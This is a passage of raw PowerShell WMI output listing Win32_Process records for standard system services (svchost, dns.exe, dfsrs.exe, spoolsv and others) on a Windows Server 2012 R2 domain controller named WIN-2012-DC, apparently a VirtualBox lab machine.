QuotaNonPagedPoolUsage : 15 QuotaPagedPoolUsage : 174 QuotaPeakNonPagedPoolUsage : 20 QuotaPeakPagedPoolUsage : 174 ReadOperationCount : 2 ReadTransferCount : 4608 SessionId : 0 Status : TerminationDate : ThreadCount : 8 UserModeTime : 1250000 VirtualSize : 47263744 WindowsVersion : 6.3.9600 WorkingSetSize : 7065600 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 364 VM : 47263744 WS : 7065600 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="600" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="600" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k RPCSS CreationClassName : Win32_Process CreationDate : 20170712121428.502822-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 600 HandleCount : 333 InstallDate : KernelModeTime : 6562500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 1702 OtherTransferCount : 82954 PageFaults : 5020 PageFileUsage : 3080 ParentProcessId : 440 PeakPageFileUsage : 4380 PeakVirtualSize : 32124928 PeakWorkingSetSize : 7540 Priority : 8 PrivatePageCount : 3153920 ProcessId : 600 QuotaNonPagedPoolUsage : 18 QuotaPagedPoolUsage : 71 QuotaPeakNonPagedPoolUsage : 26 QuotaPeakPagedPoolUsage : 72 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 7 UserModeTime : 10781250 VirtualSize : 27353088 WindowsVersion : 6.3.9600 WorkingSetSize : 3796992 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 333 VM : 27353088 WS : 3796992 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="716" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="716" Caption : dwm.exe CommandLine : "dwm.exe" CreationClassName : Win32_Process CreationDate : 20170712121428.721530-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : dwm.exe ExecutablePath : C:\Windows\system32\dwm.exe ExecutionState : Handle : 716 HandleCount : 174 InstallDate : KernelModeTime : 6718750 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : dwm.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 276 OtherTransferCount : 1874 PageFaults : 141908 PageFileUsage : 25232 ParentProcessId : 380 PeakPageFileUsage : 29976 PeakVirtualSize : 151556096 PeakWorkingSetSize : 64424 Priority : 13 PrivatePageCount : 25837568 ProcessId : 716 QuotaNonPagedPoolUsage : 18 QuotaPagedPoolUsage : 248 QuotaPeakNonPagedPoolUsage : 21 QuotaPeakPagedPoolUsage : 285 ReadOperationCount : 1 ReadTransferCount : 60 SessionId : 1 Status : TerminationDate : ThreadCount : 7 UserModeTime : 7343750 VirtualSize : 135208960 WindowsVersion : 6.3.9600 WorkingSetSize : 48881664 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : dwm.exe Handles : 174 VM : 135208960 WS : 48881664 Path : C:\Windows\system32\dwm.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="744" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="744" Caption : VBoxService.exe CommandLine : C:\Windows\System32\VBoxService.exe CreationClassName : Win32_Process CreationDate : 20170712121428.800220-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : VBoxService.exe ExecutablePath : C:\Windows\System32\VBoxService.exe ExecutionState : Handle : 744 HandleCount : 138 InstallDate : KernelModeTime : 3750000 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : VBoxService.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 465654 OtherTransferCount : 12640194 PageFaults : 84135 PageFileUsage : 1912 ParentProcessId : 440 PeakPageFileUsage : 1972 PeakVirtualSize : 60723200 PeakWorkingSetSize : 4924 Priority : 8 PrivatePageCount : 1957888 ProcessId : 744 QuotaNonPagedPoolUsage : 10 QuotaPagedPoolUsage : 98 QuotaPeakNonPagedPoolUsage : 11 QuotaPeakPagedPoolUsage : 99 ReadOperationCount : 2295 ReadTransferCount : 9180 SessionId : 0 Status : TerminationDate : ThreadCount : 10 UserModeTime : 1093750 VirtualSize : 59535360 WindowsVersion : 6.3.9600 WorkingSetSize : 2842624 WriteOperationCount : 2295 WriteTransferCount : 36720 PSComputerName : WIN-2012-DC ProcessName : VBoxService.exe Handles : 138 VM : 59535360 WS : 2842624 Path : C:\Windows\System32\VBoxService.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="828" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="828" Caption : svchost.exe CommandLine : C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted CreationClassName : Win32_Process CreationDate : 20170712121428.974985-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\System32\svchost.exe ExecutionState : Handle : 828 HandleCount : 454 InstallDate : KernelModeTime : 2656250 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 11449 OtherTransferCount : 278936 PageFaults : 15593 PageFileUsage : 11600 ParentProcessId : 440 PeakPageFileUsage : 12628 PeakVirtualSize : 417185792 PeakWorkingSetSize : 18704 Priority : 8 PrivatePageCount : 11878400 ProcessId : 828 QuotaNonPagedPoolUsage : 20 QuotaPagedPoolUsage : 99 QuotaPeakNonPagedPoolUsage : 90 QuotaPeakPagedPoolUsage : 775 ReadOperationCount : 630 ReadTransferCount : 20226304 SessionId : 0 Status : TerminationDate : ThreadCount : 12 UserModeTime : 4062500 VirtualSize : 61456384 WindowsVersion : 6.3.9600 WorkingSetSize : 10960896 WriteOperationCount : 1981 WriteTransferCount : 24967416 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 454 VM : 61456384 WS : 10960896 Path : C:\Windows\System32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="868" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="868" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k netsvcs CreationClassName : Win32_Process CreationDate : 20170712121429.077424-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 868 HandleCount : 1475 InstallDate : KernelModeTime : 1416875000 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 16234650 OtherTransferCount : 4483847620 PageFaults : 7101408 PageFileUsage : 32672 ParentProcessId : 440 PeakPageFileUsage : 529172 PeakVirtualSize : 1013297152 PeakWorkingSetSize : 503340 Priority : 8 PrivatePageCount : 33456128 ProcessId : 868 QuotaNonPagedPoolUsage : 55 QuotaPagedPoolUsage : 310 QuotaPeakNonPagedPoolUsage : 1411 QuotaPeakPagedPoolUsage : 545 ReadOperationCount : 636061 ReadTransferCount : 4894774184 SessionId : 0 Status : TerminationDate : ThreadCount : 36 UserModeTime : 2436875000 VirtualSize : 701538304 WindowsVersion : 6.3.9600 WorkingSetSize : 32976896 WriteOperationCount : 66929 WriteTransferCount : 6173153501 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 1475 VM : 701538304 WS : 32976896 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="916" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="916" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k LocalService CreationClassName : Win32_Process CreationDate : 20170712121429.146469-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 916 HandleCount : 476 InstallDate : KernelModeTime : 937500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 8412 OtherTransferCount : 477118 PageFaults : 5256 PageFileUsage : 4960 ParentProcessId : 440 PeakPageFileUsage : 5688 PeakVirtualSize : 86732800 PeakWorkingSetSize : 10468 Priority : 8 PrivatePageCount : 5079040 ProcessId : 916 QuotaNonPagedPoolUsage : 26 QuotaPagedPoolUsage : 176 QuotaPeakNonPagedPoolUsage : 31 QuotaPeakPagedPoolUsage : 180 ReadOperationCount : 58 ReadTransferCount : 7882 SessionId : 0 Status : TerminationDate : ThreadCount : 17 UserModeTime : 2500000 VirtualSize : 82997248 WindowsVersion : 6.3.9600 WorkingSetSize : 7589888 WriteOperationCount : 13 WriteTransferCount : 1156 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 476 VM : 82997248 WS : 7589888 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="976" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="976" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k NetworkService CreationClassName : Win32_Process CreationDate : 20170712121429.232454-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 976 HandleCount : 765 InstallDate : KernelModeTime : 27968750 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 114190 OtherTransferCount : 7318686 PageFaults : 69903 PageFileUsage : 10460 ParentProcessId : 440 PeakPageFileUsage : 28680 PeakVirtualSize : 1432371200 PeakWorkingSetSize : 37824 Priority : 8 PrivatePageCount : 10711040 ProcessId : 976 QuotaNonPagedPoolUsage : 59 QuotaPagedPoolUsage : 198 QuotaPeakNonPagedPoolUsage : 635 QuotaPeakPagedPoolUsage : 681 ReadOperationCount : 2943 ReadTransferCount : 24663723 SessionId : 0 Status : TerminationDate : ThreadCount : 18 UserModeTime : 21406250 VirtualSize : 1192726528 WindowsVersion : 6.3.9600 WorkingSetSize : 13594624 WriteOperationCount : 47787 WriteTransferCount : 240797843 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 765 VM : 1192726528 WS : 13594624 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="432" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="432" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork CreationClassName : Win32_Process CreationDate : 20170712121429.404423-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 432 HandleCount : 367 InstallDate : KernelModeTime : 468750 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 4261 OtherTransferCount : 204542 PageFaults : 9080 PageFileUsage : 6392 ParentProcessId : 440 PeakPageFileUsage : 6732 PeakVirtualSize : 53354496 PeakWorkingSetSize : 10496 Priority : 8 PrivatePageCount : 6545408 ProcessId : 432 QuotaNonPagedPoolUsage : 33 QuotaPagedPoolUsage : 87 QuotaPeakNonPagedPoolUsage : 36 QuotaPeakPagedPoolUsage : 89 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 17 UserModeTime : 1718750 VirtualSize : 51679232 WindowsVersion : 6.3.9600 WorkingSetSize : 5402624 WriteOperationCount : 1 WriteTransferCount : 32768 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 367 VM : 51679232 WS : 5402624 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1416" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1416" Caption : spoolsv.exe CommandLine : C:\Windows\System32\spoolsv.exe CreationClassName : Win32_Process CreationDate : 20170712121450.375156-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : spoolsv.exe ExecutablePath : C:\Windows\System32\spoolsv.exe ExecutionState : Handle : 1416 HandleCount : 371 InstallDate : KernelModeTime : 468750 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : spoolsv.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 862 OtherTransferCount : 34088 PageFaults : 3144 PageFileUsage : 3036 ParentProcessId : 440 PeakPageFileUsage : 3424 PeakVirtualSize : 74260480 PeakWorkingSetSize : 8664 Priority : 8 PrivatePageCount : 3108864 ProcessId : 1416 QuotaNonPagedPoolUsage : 20 QuotaPagedPoolUsage : 153 QuotaPeakNonPagedPoolUsage : 24 QuotaPeakPagedPoolUsage : 158 ReadOperationCount : 3 ReadTransferCount : 1464 SessionId : 0 Status : TerminationDate : ThreadCount : 9 UserModeTime : 468750 VirtualSize : 72437760 WindowsVersion : 6.3.9600 WorkingSetSize : 2703360 WriteOperationCount : 2 WriteTransferCount : 320 PSComputerName : WIN-2012-DC ProcessName : spoolsv.exe Handles : 371 VM : 72437760 WS : 2703360 Path : C:\Windows\System32\spoolsv.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1368" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1368" Caption : Microsoft.ActiveDirectory.WebServices.exe CommandLine : C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe CreationClassName : Win32_Process CreationDate : 20170712121450.413055-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : Microsoft.ActiveDirectory.WebServices.exe ExecutablePath : C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe ExecutionState : Handle : 1368 HandleCount : 1137 InstallDate : KernelModeTime : 1718750 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : Microsoft.ActiveDirectory.WebServices.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 19837 OtherTransferCount : 664902 PageFaults : 36144 PageFileUsage : 30624 ParentProcessId : 440 PeakPageFileUsage : 33404 PeakVirtualSize : 595652608 PeakWorkingSetSize : 40372 Priority : 8 PrivatePageCount : 31358976 ProcessId : 1368 QuotaNonPagedPoolUsage : 38 QuotaPagedPoolUsage : 350 QuotaPeakNonPagedPoolUsage : 45 QuotaPeakPagedPoolUsage : 351 ReadOperationCount : 145 ReadTransferCount : 429485 SessionId : 0 Status : TerminationDate : ThreadCount : 9 UserModeTime : 4218750 VirtualSize : 591695872 WindowsVersion : 6.3.9600 WorkingSetSize : 8187904 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : Microsoft.ActiveDirectory.WebServices.exe Handles : 1137 VM : 591695872 WS : 8187904 Path : C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1408" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1408" Caption : dfsrs.exe CommandLine : C:\Windows\system32\DFSRs.exe CreationClassName : Win32_Process CreationDate : 20170712121450.696161-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : dfsrs.exe ExecutablePath : C:\Windows\system32\DFSRs.exe ExecutionState : Handle : 1408 HandleCount : 326 InstallDate : KernelModeTime : 82187500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : dfsrs.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 1135772 OtherTransferCount : 205072548 PageFaults : 24017 PageFileUsage : 14000 ParentProcessId : 440 PeakPageFileUsage : 16580 PeakVirtualSize : 634163200 PeakWorkingSetSize : 20244 Priority : 8 PrivatePageCount : 14336000 ProcessId : 1408 QuotaNonPagedPoolUsage : 31 QuotaPagedPoolUsage : 125 QuotaPeakNonPagedPoolUsage : 35 QuotaPeakPagedPoolUsage : 125 ReadOperationCount : 2257 ReadTransferCount : 11713324 SessionId : 0 Status : TerminationDate : ThreadCount : 16 UserModeTime : 167031250 VirtualSize : 632573952 WindowsVersion : 6.3.9600 WorkingSetSize : 8740864 WriteOperationCount : 7233 WriteTransferCount : 96925643 PSComputerName : WIN-2012-DC ProcessName : dfsrs.exe Handles : 326 VM : 632573952 WS : 8740864 Path : C:\Windows\system32\DFSRs.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1508" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1508" Caption : dns.exe CommandLine : C:\Windows\system32\dns.exe CreationClassName : Win32_Process CreationDate : 20170712121450.752362-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : dns.exe ExecutablePath : C:\Windows\system32\dns.exe ExecutionState : Handle : 1508 HandleCount : 10288 InstallDate : KernelModeTime : 5625000 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : dns.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 57082 OtherTransferCount : 1418712 PageFaults : 30531 PageFileUsage : 89072 ParentProcessId : 440 PeakPageFileUsage : 89472 PeakVirtualSize : 147890176 PeakWorkingSetSize : 87164 Priority : 8 PrivatePageCount : 91209728 ProcessId : 1508 QuotaNonPagedPoolUsage : 10059 QuotaPagedPoolUsage : 1262 QuotaPeakNonPagedPoolUsage : 10295 QuotaPeakPagedPoolUsage : 1264 ReadOperationCount : 75 ReadTransferCount : 8700 SessionId : 0 Status : TerminationDate : ThreadCount : 14 UserModeTime : 2812500 VirtualSize : 146837504 WindowsVersion : 6.3.9600 WorkingSetSize : 9383936 WriteOperationCount : 78 WriteTransferCount : 12000 PSComputerName : WIN-2012-DC ProcessName : dns.exe Handles : 10288 VM : 146837504 WS : 9383936 Path : C:\Windows\system32\dns.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1548" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1548" Caption : ismserv.exe CommandLine : C:\Windows\System32\ismserv.exe CreationClassName : Win32_Process CreationDate : 20170712121450.809793-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : ismserv.exe ExecutablePath : C:\Windows\System32\ismserv.exe ExecutionState : Handle : 1548 HandleCount : 88 InstallDate : KernelModeTime : 156250 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : ismserv.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 377 OtherTransferCount : 6646 PageFaults : 1448 PageFileUsage : 1380 ParentProcessId : 440 PeakPageFileUsage : 1640 PeakVirtualSize : 29483008 PeakWorkingSetSize : 4108 Priority : 8 PrivatePageCount : 1413120 ProcessId : 1548 QuotaNonPagedPoolUsage : 11 QuotaPagedPoolUsage : 39 QuotaPeakNonPagedPoolUsage : 12 QuotaPeakPagedPoolUsage : 39 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 6 UserModeTime : 0 VirtualSize : 26324992 WindowsVersion : 6.3.9600 WorkingSetSize : 839680 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : ismserv.exe Handles : 88 VM : 26324992 WS : 839680 Path : C:\Windows\System32\ismserv.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1700" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1700" Caption : wlms.exe CommandLine : C:\Windows\system32\wlms\wlms.exe CreationClassName : Win32_Process CreationDate : 20170712121451.074083-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : wlms.exe ExecutablePath : C:\Windows\system32\wlms\wlms.exe ExecutionState : Handle : 1700 HandleCount : 39 InstallDate : KernelModeTime : 0 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : wlms.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 51 OtherTransferCount : 194 PageFaults : 1090 PageFileUsage : 484 ParentProcessId : 440 PeakPageFileUsage : 576 PeakVirtualSize : 15691776 PeakWorkingSetSize : 2620 Priority : 8 PrivatePageCount : 495616 ProcessId : 1700 QuotaNonPagedPoolUsage : 4 QuotaPagedPoolUsage : 29 QuotaPeakNonPagedPoolUsage : 5 QuotaPeakPagedPoolUsage : 29 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 2 UserModeTime : 0 VirtualSize : 14626816 WindowsVersion : 6.3.9600 WorkingSetSize : 1306624 WriteOperationCount : 48 WriteTransferCount : 1228 PSComputerName : WIN-2012-DC ProcessName : wlms.exe Handles : 39 VM : 14626816 WS : 1306624 Path : C:\Windows\system32\wlms\wlms.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1708" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1708" Caption : dfssvc.exe CommandLine : C:\Windows\system32\dfssvc.exe CreationClassName : Win32_Process CreationDate : 20170712121451.112485-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : dfssvc.exe ExecutablePath : C:\Windows\system32\dfssvc.exe ExecutionState : Handle : 1708 HandleCount : 131 InstallDate : KernelModeTime : 156250 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : dfssvc.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 437 OtherTransferCount : 10480 PageFaults : 2137 PageFileUsage : 1912 ParentProcessId : 440 PeakPageFileUsage : 2068 PeakVirtualSize : 32190464 PeakWorkingSetSize : 5000 Priority : 8 PrivatePageCount : 1957888 ProcessId : 1708 QuotaNonPagedPoolUsage : 13 QuotaPagedPoolUsage : 48 QuotaPeakNonPagedPoolUsage : 15 QuotaPeakPagedPoolUsage : 48 ReadOperationCount : 15 ReadTransferCount : 3374 SessionId : 0 Status : TerminationDate : ThreadCount : 11 UserModeTime : 0 VirtualSize : 30593024 WindowsVersion : 6.3.9600 WorkingSetSize : 2887680 WriteOperationCount : 14 WriteTransferCount : 6034 PSComputerName : WIN-2012-DC ProcessName : dfssvc.exe Handles : 131 VM : 30593024 WS : 2887680 Path : C:\Windows\system32\dfssvc.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1316" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1316" Caption : vds.exe CommandLine : C:\Windows\System32\vds.exe CreationClassName : Win32_Process CreationDate : 20170712121512.030634-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : vds.exe ExecutablePath : C:\Windows\System32\vds.exe ExecutionState : Handle : 1316 HandleCount : 158 InstallDate : KernelModeTime : 625000 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : vds.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 841 OtherTransferCount : 28175 PageFaults : 2931 PageFileUsage : 1772 ParentProcessId : 440 PeakPageFileUsage : 2152 PeakVirtualSize : 48394240 PeakWorkingSetSize : 7856 Priority : 8 PrivatePageCount : 1814528 ProcessId : 1316 QuotaNonPagedPoolUsage : 16 QuotaPagedPoolUsage : 88 QuotaPeakNonPagedPoolUsage : 19 QuotaPeakPagedPoolUsage : 92 ReadOperationCount : 32 ReadTransferCount : 94208 SessionId : 0 Status : TerminationDate : ThreadCount : 11 UserModeTime : 156250 VirtualSize : 45608960 WindowsVersion : 6.3.9600 WorkingSetSize : 1138688 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : vds.exe Handles : 158 VM : 45608960 WS : 1138688 Path : 